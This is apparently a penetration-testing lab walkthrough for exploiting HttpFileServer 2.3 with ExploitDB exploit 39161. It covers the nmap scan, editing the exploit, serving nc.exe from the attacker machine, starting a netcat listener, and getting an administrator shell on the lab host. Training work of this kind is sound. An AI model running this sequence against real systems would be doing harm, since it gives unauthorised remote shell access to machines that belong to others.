🔬Fixing Exploits - HFS
Lab 1
Same as the HFS - MSF Exploit Lab
Target IP:
10.2.23.79
Manually exploit the target with ExploitDB exploits
Attacker machine is offline
nmap -sV 10.2.23.79
80/tcp open http HttpFileServer httpd 2.3
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Use
searchsploit
to identifyHttpFileServer httpd 2.3
vulnerabilities
searchsploit HTTP File Server 2.3

Copy the exploit to the Desktop
cd Desktop/
searchsploit -m 39161
Analyzing the Exploit
vim 39161.py

Read the exploit
You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). You may need to run it multiple times for success!
ip_addr
- change to attacker Kali Linux IPlocal_port
- change to 1234
Execute the Exploit
Save and run the exploit
# In a new terminal session
cd Desktop/
cp /usr/share/windows-resources/binaries/nc.exe .
python -m SimpleHTTPServer 80
# In a new terminal session
# Run the netcat listener on the exploit specified "local_port"
nc -nvlp 1234
# From the first terminal windows, run the exploit
python 39161.py 10.2.23.79 80
whoami
win-omcnbkr66mn\administrator
systeminfo

Last updated
Was this helpful?